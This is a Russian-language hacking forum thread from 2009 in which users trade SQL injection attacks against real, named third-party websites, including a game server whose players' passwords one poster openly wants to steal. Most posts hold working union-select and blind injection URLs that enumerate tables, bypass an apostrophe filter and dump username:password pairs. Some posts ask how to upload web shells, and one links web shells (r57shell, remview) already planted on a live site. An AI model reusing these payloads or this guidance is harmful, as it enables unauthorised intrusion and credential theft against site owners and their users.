RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj)
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-14 13:19:15.503333
|
|
|
z00MAN
Сообщений: 18
Оценки: 0
Присоединился: 2009-02-14 18:30:37.080000
|
quote:
ORIGINAL: Fedi
Так я там определил имя юзера владельца БД и имя базы данных юзера. Что теперь с этим делать?
смотря какие цели ты себе поставил.
доставай юзеров и т д
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-14 14:16:50.336666
|
|
|
Fedi
Сообщений: 43
Оценки: 0
Присоединился: 2009-03-04 13:16:12.456666
|
Я юзеров и пароли хочу вытащить только как?)) Возможно вытащить пароли и логины от играков сервера непосредственно для игры?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-14 18:54:02.476666
|
|
|
z00MAN
Сообщений: 18
Оценки: 0
Присоединился: 2009-02-14 18:30:37.080000
|
quote:
ORIGINAL: Fedi
Я юзеров и пароли хочу вытащить только как?)) Возможно вытащить пароли и логины от играков сервера непосредственно для игры?
читай мануалы
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-14 19:16:32.290000
|
|
|
krik
Сообщений: 86
Оценки: 0
Присоединился: 2008-01-11 23:03:04.066666
|
http://xnet.lv/akcijas.php?akcija='
тут можно что нить сделать? при -1 ошибка проподает
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-14 20:42:48.613333
|
|
|
S00pY
Сообщений: 785
Оценки: 0
Присоединился: 2007-04-14 20:44:05.376666
|
_http://xnet.lv/akcijas.php?akcija=1+and+substring(@@version,1,1)=5
при неверной логике кидает на маин пагу… вывод версия бд 5
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-14 21:32:26.983333
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
http://xnet.lv/akcijas.php?akcija=1+and+substring(version(),1,1)=5
S00Py!!!!!!!!))))))
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-15 10:02:19.136666
|
|
|
Fedi
Сообщений: 43
Оценки: 0
Присоединился: 2009-03-04 13:16:12.456666
|
Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright © 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2) - выдало при запросе версии что можно еще попробывать какими способами из базы можно дастать юзеров и пароли?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-15 10:52:01.313333
|
|
|
Fedi
Сообщений: 43
Оценки: 0
Присоединился: 2009-03-04 13:16:12.456666
|
Я также узнал с помощью
SELECT user_name();
SELECT system_user;
SELECT user;
имя юзера stat и имя таблицы с помощью:
DB_NAME() - имя таблицы: lin2world
как узнать больше инфы и юзеров с их паролями?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-15 13:55:01.026666
|
|
|
Fedi
Сообщений: 43
Оценки: 0
Присоединился: 2009-03-04 13:16:12.456666
|
С помощью DB_NAME(n) перебирая n я нашел еще
1)master
2)tempdb
3)model
4)msdb
5)lin2db
6)lin2comm
7)l2gloss
8)lin2world
9) lin2log
10)lin2clancomm
Плиз скажите как с ними работать и что полезного и как из них взять.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-15 16:49:49.800000
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
версия - 1 or 1=@@version–
таблицы - 1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)–
колонки - 1+or+1=(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+TABLES+WHERE+TABLE_NAME+NOT+IN+('имя таблицы'))–
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-15 17:09:30.390000
|
|
|
Fedi
Сообщений: 43
Оценки: 0
Присоединился: 2009-03-04 13:16:12.456666
|
Проблема в том что запросы такого видв не проходят. Всю информацию я узнал только через union select. И подставлял в запрос вместо цифр DB_NAME(n) user_name() @@version.\
Можно ли с использованием union select сделать что нибудь?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-15 17:15:22.310000
|
|
|
Fedi
Сообщений: 43
Оценки: 0
Присоединился: 2009-03-04 13:16:12.456666
|
http://darkomen.ru/?go=19&indx=1304+union+select+1,2,3,4,5,6,7,8,9,0,11,12– подставлял вместо тройки и на странице появлялись значения.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-16 10:55:44.253333
|
|
|
regG!De.d0c
Сообщений: 18
Оценки: 0
Присоединился: 2009-03-16 10:40:58.300000
|
Fedi,
Список пользовательских таблиц можно получить запросом
select name from sysobjects where type='U'
Но!
Во-первых, там видимо фильтруются апострофы, т.к. запрос вида
http://darkomen.ru/?go=19&indx=-1+union+all+select+1,2,COUNT(*),4,5,6,7,8,9,0,11,12+from+sysobjects+where+type='U'–
ничего не дает :(
Зато работает такой
http://darkomen.ru/?go=19&indx=-1+union+all+select+1,2,count(*),4,5,6,7,8,9,0,11,12+from+sysobjects+where+ASCII(type)=85–
;)
Во-вторых, при попытке вставить в select имя колонки:
http://darkomen.ru/?go=19&indx=-1+union+all+select+1,2,name,4,5,6,7,id,9,0,11,12+from+sysobjects+where+ASCII(type)=85–
тоже получаем…ничего.
А вот если так:
http://darkomen.ru/?go=19&indx=-1+union+all+select+1,2,CHAR(ASCII(LEFT(name,1)))%2BCHAR(ASCII(substring(name,2,1)))%2BCHAR(ASCII(substring(name,3,1)))%2BCHAR(ASCII(substring(name,4,1)))%2BCHAR(ASCII(substring(name,5,1)))%2BCHAR(ASCII(substring(name,6,1)))%2BCHAR(ASCII(substring(name,7,1)))%2BCHAR(ASCII(substring(name,8,1)))%2BCHAR(ASCII(substring(name,9,1)))%2BCHAR(ASCII(substring(name,10,1)))%2BCHAR(ASCII(substring(name,11,1)))%2BCHAR(ASCII(substring(name,12,1)))%2BCHAR(ASCII(substring(name,13,1)))%2BCHAR(ASCII(substring(name,14,1)))%2BCHAR(ASCII(substring(name,15,1)))%2BCHAR(ASCII(substring(name,16,1))),4,5,6,7,id,9,0,11,12+from+sysobjects+where+ASCII(type)=85–
все ок ;)
Аналогично вытягиваем имена колонок по id таблицы из syscolumns и т.д.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-17 16:06:42.856666
|
|
|
Redfo][
Сообщений: 23
Оценки: 0
Присоединился: 2009-03-17 13:21:11.420000
|
у меня проблема немогу вывести таблицу юзеров дашол только досюда
http://pecom.ru/ru/news/index.php?id=-1+union+select+1,2,TABLE_NAME,4,5,6,7,8,9,10+%20FROM%20INFORMATION_SCHEMA.TABLES%20–
а дальше немогу [sm=bu.gif] подскажите пожалуста че нетак[sm=bh.gif]
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-17 16:14:44.370000
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
а это что???
npk_usergroups
npk_users
npk_usersystems
——————–
Господи, какие вы ленивые:
http://pecom.ru/ru/news/index.php?id=-1+union+select+1,2,column_name,4,5,6,7,8,9,10+FROM+INFORMATION_SCHEMA.columns+where+table_name='npk_users'--
http://pecom.ru/ru/news/index.php?id=-1+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10+FROM+npk_users--
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-17 16:22:50.833333
|
|
|
Redfo][
Сообщений: 23
Оценки: 0
Присоединился: 2009-03-17 13:21:11.420000
|
извени я видел эти таблицы
npk_usergroups
npk_users
npk_usersystems
просто немог правельно сформулировать запрос ведь это моя первая иньекция а тебе ++ спасибо
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-17 16:25:24.353333
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
Если бы тебе правда было интересно, то, прежде, чем задавать такие вопросы, ты бы прочел эту тему, начиная с первой страницы, открыл бы для себя много нового и интересного, включая твой вопрос.
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-17 20:18:12.763333
|
|
|
Lightsaber
Сообщений: 78
Оценки: 0
Присоединился: 2009-02-22 14:40:54.653333
|
ну а где админка на этом сайте оч интересно?))
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-17 21:02:04.130000
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
http://forum.xakep.ru/m_1383906/tm.htm
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-17 21:55:50.780000
|
|
|
Lightsaber
Сообщений: 78
Оценки: 0
Присоединился: 2009-02-22 14:40:54.653333
|
не помогает кидает много вариантов ни 1 не пашет((((
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-17 22:01:31.346666
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
Readme надо читать, просто сначала определить надо было, что сайт выдаёт, когда страница не найдена, а выдайт он это:
"Запрашиваемая вами страница не найдена", как четкое определение запроса
т.е. то, что в кавычках, надо просто добавить в errors.txt с новой строки
Как результат, сразу же, http://pecom.ru/adm
но там закрыт доступ .htaccess-ом, так что облом
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-17 22:10:16.540000
|
|
|
Lightsaber
Сообщений: 78
Оценки: 0
Присоединился: 2009-02-22 14:40:54.653333
|
а чем это таким странным закрыт доступ реально?)) и что никак нельзя зайти? странно((((
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-17 22:12:56.400000
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
Никак. Только брут или залить шелл и прочитать .htaccess и .htpasswd потом
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-17 22:14:13.686666
|
|
|
Lightsaber
Сообщений: 78
Оценки: 0
Присоединился: 2009-02-22 14:40:54.653333
|
и как обойти эту ерунду?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-17 22:15:45.020000
|
|
|
Lightsaber
Сообщений: 78
Оценки: 0
Присоединился: 2009-02-22 14:40:54.653333
|
кста а как залить шелл через скуль? а то у мя камп новый стравй винт полетел а на нём вся инфа я loadfile() функцию ваще забыл((( подскаж плиз на примере как шелл залить моно? а то я даж на свой хостинг уже забыл как через тотал заходить порт пишет неправильный(((
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-17 22:29:08.430000
|
|
|
Pashkela
Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
|
читай эту тему от и до, тут всё есть, заманали уже:)
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-17 22:31:44.256666
|
|
|
Lightsaber
Сообщений: 78
Оценки: 0
Присоединился: 2009-02-22 14:40:54.653333
|
та у мя проблема я не могу зайти на свйо хостинг через тоталО_О как это сделать ппц
твой вопрос имеет отношение к sql-inj??? Будешь флудить не в тему - будут последствия
извиняюсь
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-18 21:43:15.880000
|
|
|
Redfo][
Сообщений: 23
Оценки: 0
Присоединился: 2009-03-17 13:21:11.420000
|
www.webpacientes.org/2005/patologias/index.php?p=enum&id=1' уязвим
вот немогу подобрать кол-во полей я через order by провбовал ошибка вообше не пропадает и когда пишу
http://www.webpacientes.org/2005/patologias/index.php?p=enum&id=1+union+select+1–
ошибка хоть так хоть сяк не пропадает8|
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-18 21:54:40.226666
|
|
|
Redfo][
Сообщений: 23
Оценки: 0
Присоединился: 2009-03-17 13:21:11.420000
|
вот еше подобрал столбцы http://www.lecka.net/skupina.php?sid=7+order+by+5–
а вводиш так http://www.lecka.net/skupina.php?sid=7+union+select+1,2,3,4,5–
ошибка
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-19 10:40:11.890000
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
http://www.lecka.net/skupina.php?sid=-7+union+select+null,version(),null,null,null--
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-19 13:20:33.420000
|
|
|
alex7474
Сообщений: 54
Оценки: 0
Присоединился: 2008-09-11 11:29:55.193333
|
quote:
t/skup
держи в помощь
?php
$db = pg_connect("dbname=webpacientes");
$query = "select nom from patologies where id='$id'";
$result = pg_query($db, $query);
$row = pg_fetch_row($result,0);
?> <p align="justify" class="textnormal"><strong>Nombre de la patolog&iacute;a: <?php echo $row[0];?></strong></p> <?php
$query = "select distinct noticies.id, noticies.titol, noticies.data from noticies,not2patologia where not2patologia.idpat = '$id' and noticies.id = not2patologia.idnot order by noticies.data desc";
$result = pg_query($db, $query);
$num = pg_numrows($result);
if ($num <> 0) {
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-19 13:57:34.766666
|
|
|
Isusik
Сообщений: 56
Оценки: 0
Присоединился: 2008-11-26 19:59:18.656666
|
http://fank.ru/downloads/music/artist/203/?q=%27
какая то внурения ошибка очень часто вылетает, на что это похожа ?:)
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-19 21:38:02.060000
|
|
|
z00MAN
Сообщений: 18
Оценки: 0
Присоединился: 2009-02-14 18:30:37.080000
|
quote:
ORIGINAL: Isusik
http://fank.ru/downloads/music/artist/203/?q=%27
какая то внурения ошибка очень часто вылетает, на что это похожа ?:)
ничего особенного
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-20 14:43:55.710000
|
|
|
Redfo][
Сообщений: 23
Оценки: 0
Присоединился: 2009-03-17 13:21:11.420000
|
quote:
ORIGINAL: alex7474
?php
$db = pg_connect("dbname=webpacientes");
$query = "select nom from patologies where id='$id'";
$result = pg_query($db, $query);
$row = pg_fetch_row($result,0);
?> <p align="justify" class="textnormal"><strong>Nombre de la patología: <?php echo $row[0];?></strong></p> <?php
$query = "select distinct noticies.id, noticies.titol, noticies.data from noticies,not2patologia where not2patologia.idpat = '$id' and noticies.id = not2patologia.idnot order by noticies.data desc";
$result = pg_query($db, $query);
$num = pg_numrows($result);
if ($num <> 0) {
А что это,а то я чета немогу понять
quote:
ORIGINAL: Isusik
http://fank.ru/downloads/music/artist/203/?q=%27
какая то внурения ошибка очень часто вылетает, на что это похожа ?:)
помню это мой сайт детства,я там постоянно для мобилы игры скачевал,а теперь и туда добрались:)
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-20 17:45:23.250000
|
|
|
Redfo][
Сообщений: 23
Оценки: 0
Присоединился: 2009-03-17 13:21:11.420000
|
хотите побаловатся? вот держите ;)
http://i-spania.ru/upload/employee/upload_files/r57shell.php
http://i-spania.ru/upload/employee/upload_files/remview.php
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-20 17:47:24.463333
|
|
|
r1dex
Сообщений: 304
Оценки: 0
Присоединился: 2008-12-09 01:55:32.130000
|
Как твой пост относится к вопросу по sql-inj?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-20 17:49:32.516666
|
|
|
Redfo][
Сообщений: 23
Оценки: 0
Присоединился: 2009-03-17 13:21:11.420000
|
Извиняюсь 8|
ну тогда вот вопрос только что нашел иньекцию но я пишу www.partner.donetsk.ua/online/culture/cinema/cinema.phtml?idcinema=4+GROUP+BY+1–
ошибка остается это значит что там вообше нет полей или с чем это связано?
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-20 18:19:59.520000
|
|
|
Redfo][
Сообщений: 23
Оценки: 0
Присоединился: 2009-03-17 13:21:11.420000
|
А вот еще допустим сайт http://www.vspji.cz/studium/view_plan.php?plan=8&id=3&id_druha_uroven=138
стираем до http://www.vspji.cz/studium и можно лазить по дериториям
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-20 19:28:10.246666
|
|
|
Lightsaber
Сообщений: 78
Оценки: 0
Присоединился: 2009-02-22 14:40:54.653333
|
скажи-ка плиз как в эти папки заливать свои например шеллы? а то через тотал нужно знатть ип а в коренвой папке я функции не видел…
|
|
|
|
|
RE: Вопросы и проблемы с SQL-инъекциями (SQL-inj) - 2009-03-20 21:21:42.486666
|
|
|
lito777
Сообщений: 51
Оценки: 0
Присоединился: 2009-01-30 04:52:45.883333
|
помогите пожалуйста с
http://www.restko.ru/firm/111111111111111111111111+union+select+mysql.user.password+from+mysql.user+where+user=%27admin%27–
вроде это слепая SQL
если да то подскажите как можно просмотреть результат запроса
|
|
|
|
|
|
